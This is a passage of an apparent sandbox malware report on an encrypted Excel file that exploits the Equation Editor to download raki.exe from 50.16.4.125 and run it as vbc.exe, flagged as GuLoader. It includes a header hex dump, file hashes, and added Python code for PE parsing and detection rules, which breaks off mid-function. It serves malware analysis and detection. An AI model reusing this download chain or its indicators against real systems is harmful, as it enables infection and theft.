      SHA-256:180125C408724BB6EF0037C028439058D6F0B8326B679E02D7CBA8D24461C3BF
      SHA-512:A9320B25B8F28BFB93320A4D3D58C31DEBD94079D3902313429487DCED83E5E223481AC38DE4FCBC752D5C6C5B95F5B4B74A7DD03CFCA69C5C4523F3DE34D45C
      Malicious:false
      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):165
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
      MD5:797869BB881CFBCDAC2064F92B26E46F
      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
      Malicious:true
      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):170120
      Entropy (8bit):7.49730405573374
      Encrypted:false
      SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
      MD5:0DCB37FF90B93B7A3225707B1AF111B8
      SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
      SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
      SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
      Malicious:true
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      File type:CDFV2 Encrypted
      Entropy (8bit):7.957948536702047
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:7027521.xlsx
      File size:191800
      MD5:e96baf78f2a98321ae47d4d82e608124
      SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
      SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
      SHA512:a9320b25b8f28bfb93320a4d3d58c31debd94079d3902313429487dced83e5e223481ac38de4fcbc752d5c6c5b95f5b4b74a7dd03cfca69c5c4523f3de34d45c
      SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
      File Content Preview:........................>......................................................................................................................................................................................................................................
      Icon Hash:e4e2aa8aa4b4bcb4
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 26, 2022 10:40:53.428663969 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.566884995 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.566993952 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.567604065 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.706120968 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.706151962 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.706163883 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.706176996 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.706288099 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844465971 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844506025 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844528913 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844552040 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844574928 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844598055 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844609022 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844620943 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844645023 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.844646931 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844652891 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844655991 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844657898 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.844676018 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983169079 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983196020 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983218908 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983242989 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983264923 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983288050 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983310938 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983330965 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983335972 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983361959 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983406067 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983429909 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983432055 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983453035 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983455896 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983470917 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983475924 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983491898 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983499050 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983503103 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983520985 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.983530045 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.983549118 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.985578060 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.985764980 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:53.985835075 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:53.986990929 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.121912003 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.121941090 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.121958017 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.121974945 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.121990919 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122008085 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122025013 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122040033 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122044086 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122060061 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122076035 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122080088 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122080088 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122082949 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122097969 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122097969 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122113943 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122117043 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122127056 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122136116 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122148037 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122154951 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122169971 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122174025 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122184038 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122191906 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122210026 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122210979 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122226000 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122226954 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122242928 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122245073 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122256041 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122262955 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122270107 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122279882 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122294903 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122298002 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122308969 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122315884 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122324944 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122334957 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122349977 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122351885 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122364998 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122370005 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122380972 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122389078 CET  80           49167      50.16.4.125   192.168.2.22
Jan 26, 2022 10:40:54.122406006 CET  49167        80         192.168.2.22  50.16.4.125
Jan 26, 2022 10:40:54.122407913 CET  80           49167      50.16.4.125   192.168.2.22
      • 50.16.4.125
Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49167        50.16.4.125     80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp                            kBytes transferred  Direction  Data
Jan 26, 2022 10:40:53.567604065 CET  0                   OUT        GET /E/raki.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 50.16.4.125
      Connection: Keep-Alive
Jan 26, 2022 10:40:53.706120968 CET  1                   IN         HTTP/1.1 200 OK
      Date: Wed, 26 Jan 2022 09:40:54 GMT
      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14
      Last-Modified: Wed, 26 Jan 2022 04:12:20 GMT
      ETag: "29888-5d6746870006c"
      Accept-Ranges: bytes
      Content-Length: 170120
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@|@.texthj `.rdatan@@.data@.ndata``.rsrc@@
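The following is an added example and not part of the Joe Sandbox report. It parses the PE headers of the raki.exe download out of the first 0x298 bytes of the session's Data Raw column (transcribed above into RAW) and derives the facts the report states about that file: PE32 for i386, GUI subsystem, five sections including the uninitialised .ndata section typical of a Nullsoft installer stub, the link timestamp, and how the 170120-byte Content-Length splits into headers, sections and overlay. Only the standard library is used; FILE_SIZE is the Content-Length / dropped-file size the report gives, nothing else is assumed.

```python
"""Added example, not part of the Joe Sandbox report: parse the PE headers of the
raki.exe download from the first 0x298 bytes of the session's "Data Raw" dump.
Standard library only. RAW is transcribed from the report; FILE_SIZE is the
Content-Length of the response and the size of the dropped vbc.exe it states."""
import struct
from datetime import datetime, timezone

# Bytes 0x000-0x297 of the response body (DOS header, stub, Rich header, PE and
# optional header, five section headers), 32 bytes per row, from the Data Raw column.
RAW = bytes.fromhex("""
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 d8000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
ad310881 e95066d2 e95066d2 e95066d2 2a5f39d2 eb5066d2 e95067d2 4c5066d2
2a5f3bd2 e65066d2 bd7356d2 e35066d2 2e5660d2 e85066d2 52696368 e95066d2
00000000 00000000 00000000 00000000 00000000 00000000 50450000 4c010500
5a9b4f61 00000000 00000000 e0000f01 0b010600 006a0000 00da0200 00080000
2d350000 00100000 00800000 00004000 00100000 00020000 04000000 06000000
04000000 00000000 00a00500 00040000 7c040300 02004085 00001000 00100000
00001000 00100000 00000000 10000000 00000000 00000000 10860000 a0000000
00c00400 c8d50000 00000000 00000000 f0830200 98140000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00800000 b0020000 00000000 00000000
00000000 00000000 00000000 00000000 2e746578 74000000 97680000 00100000
006a0000 00040000 00000000 00000000 00000000 20000060 2e726461 74610000
a6140000 00800000 00160000 006e0000 00000000 00000000 00000000 40000040
2e646174 61000000 18b00200 00a00000 00060000 00840000 00000000 00000000
00000000 400000c0 2e6e6461 74610000 00600100 00600300 00000000 00000000
00000000 00000000 00000000 800000c0 2e727372 63000000 c8d50000 00c00400
00d60000 008a0000 00000000 00000000 00000000 40000040
""")
FILE_SIZE = 170120  # Content-Length of the response and size of the dropped vbc.exe

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040


def parse_pe(data):
    """Return the header fields that the report's file-type line rests on."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER32 starts here
    magic, = struct.unpack_from("<H", data, opt)
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs, = struct.unpack_from("<I", data, opt + 92)
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1],
                         "va": f[2], "rawsize": f[3], "rawptr": f[4], "chars": f[9]})
    return {"machine": machine, "nsections": nsections, "timestamp": timestamp,
            "chars": chars, "magic": magic, "entry": entry, "image_base": image_base,
            "subsystem": subsystem, "dll_chars": dll_chars, "dirs": dirs,
            "sections": sections}


def assess(pe, file_size=FILE_SIZE):
    """Derive the facts a triage note would quote from the parsed headers."""
    # NSIS stubs carry an uninitialised .ndata section (SizeOfRawData 0) and keep
    # the installer payload in the overlay behind the last section's raw data.
    is_nsis = any(s["name"] == ".ndata" and s["rawsize"] == 0 for s in pe["sections"])
    end_of_sections = max(s["rawptr"] + s["rawsize"] for s in pe["sections"])
    # DYNAMIC_BASE is set, but with relocations stripped and an empty base-relocation
    # directory the loader cannot rebase the image: it always sits at ImageBase.
    _reloc_rva, reloc_size = pe["dirs"][5]
    aslr_effective = (bool(pe["dll_chars"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
                      and not pe["chars"] & IMAGE_FILE_RELOCS_STRIPPED and reloc_size > 0)
    # The security directory holds a file offset, not an RVA; here it claims exactly
    # the last 0x1498 bytes of the file. Whether that is a valid signature blob
    # cannot be told from the header alone.
    cert_off, cert_size = pe["dirs"][4]
    return {
        "pe32_i386": pe["magic"] == 0x10B and pe["machine"] == 0x14C,
        "gui": pe["subsystem"] == 2,
        "sections": [s["name"] for s in pe["sections"]],
        "is_nsis": is_nsis,
        "overlay_size": file_size - end_of_sections,
        "link_time": datetime.fromtimestamp(pe["timestamp"], timezone.utc)
                             .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "aslr_effective": aslr_effective,
        "cert_table_at_eof": cert_size > 0 and cert_off + cert_size == file_size,
    }


if __name__ == "__main__":
    for key, value in assess(parse_pe(RAW)).items():
        print(f"{key}: {value}")
```

Two things the parser surfaces that the report's one-line file type does not: the image cannot be relocated (RELOCS_STRIPPED with no .reloc directory), so it always maps at 0x400000 whatever DllCharacteristics claims, and 80008 bytes of the 170120-byte file lie past the last section, which is where an NSIS stub keeps its script and payload.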



      Target ID:0
      Start time:10:40:20
      Start date:26/01/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13f3d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:10:40:43
      Start date:26/01/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:4
      Start time:10:40:45
      Start date:26/01/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:170120 bytes
      MD5 hash:0DCB37FF90B93B7A3225707B1AF111B8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low
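The following is an added example and not part of the Joe Sandbox report. It shows the rule logic that would have fired on the chain this section records, run over records transcribed from it: the three process starts (Target ID 0, 2 and 4), the 170120-byte PE that EQNEDT32.EXE wrote to disk, and session 0 of the HTTP log with its headers shortened to the ones the rules read. Field names follow Sysmon conventions and the rules are mine. One assumption, marked in the code: vbc.exe's ParentImage is taken to be EQNEDT32.EXE, which this section does not state explicitly.

```python
"""Added example, not part of the Joe Sandbox report: detection rules that would
have flagged the chain recorded above, run over records transcribed from this
section (process list, dropped-file entry, HTTP session). Field names follow
Sysmon conventions; the rules are mine. Assumption: vbc.exe's ParentImage is
EQNEDT32.EXE, which the section does not state explicitly."""
import re

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Process starts: Target ID 0, 2 and 4 in the report (ParentImage of vbc.exe assumed).
PROCESS_EVENTS = [
    {"Image": EXCEL, "ParentImage": None, "Size": 28253536,
     "MD5": "D53B85E21886D2AF9815C377537BCAC3"},
    {"Image": EQNEDT, "ParentImage": None, "Size": 543304,
     "MD5": "A87236E214F6D42A65F5DEDAC816AEC8"},
    {"Image": VBC, "ParentImage": EQNEDT, "Size": 170120,   # parent is an assumption
     "MD5": "0DCB37FF90B93B7A3225707B1AF111B8"},
]
# The 170120-byte PE written to disk by EQNEDT32.EXE (same MD5 as vbc.exe).
FILE_DROPS = [{"Process": EQNEDT, "Size": 170120, "Head": b"MZ\x90\x00",
               "MD5": "0DCB37FF90B93B7A3225707B1AF111B8"}]
# Session 0 of the HTTP log; headers shortened to the ones the rules read.
NET_EVENT = {"Image": EQNEDT, "DestinationIp": "50.16.4.125", "DestinationPort": 80}
REQUEST = ("GET /E/raki.exe HTTP/1.1\r\nAccept: */*\r\n"
           "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
           "Trident/7.0; SLCC2)\r\nHost: 50.16.4.125\r\nConnection: Keep-Alive\r\n\r\n")
RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14\r\n"
            'ETag: "29888-5d6746870006c"\r\nContent-Length: 170120\r\n'
            "Content-Type: application/x-msdownload\r\n\r\n")
BODY_HEAD = bytes.fromhex("4d5a900003000000")   # first bytes of the Data Raw column

EQUATION_EDITOR = "eqnedt32.exe"   # never a legitimate HTTP client or PE dropper
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
BROWSER_UA = re.compile(r"MSIE \d|Trident/|Chrome/|Firefox/")
SUSPICIOUS_DIRS = ("c:\\users\\public\\",)


def parse_http_head(raw):
    """Split an HTTP message head into (start line, {lower-case name: value})."""
    start, _, rest = raw.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return start, headers


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def etag_size(etag):
    """Apache 2.4's default FileETag is "<size hex>-<mtime hex>"; return the size or None."""
    m = re.fullmatch(r'"?([0-9a-f]+)-[0-9a-f]+"?', etag or "")
    return int(m.group(1), 16) if m else None


def evaluate(processes=PROCESS_EVENTS, drops=FILE_DROPS, net=NET_EVENT,
             request=REQUEST, response=RESPONSE, body_head=BODY_HEAD):
    """Return the sorted names of the rules that fire on the given records."""
    hits = set()
    for p in processes:
        if p["ParentImage"] and basename(p["ParentImage"]) == EQUATION_EDITOR:
            hits.add("eqnedt32_spawns_process")
        if p["Image"].lower().startswith(SUSPICIOUS_DIRS):
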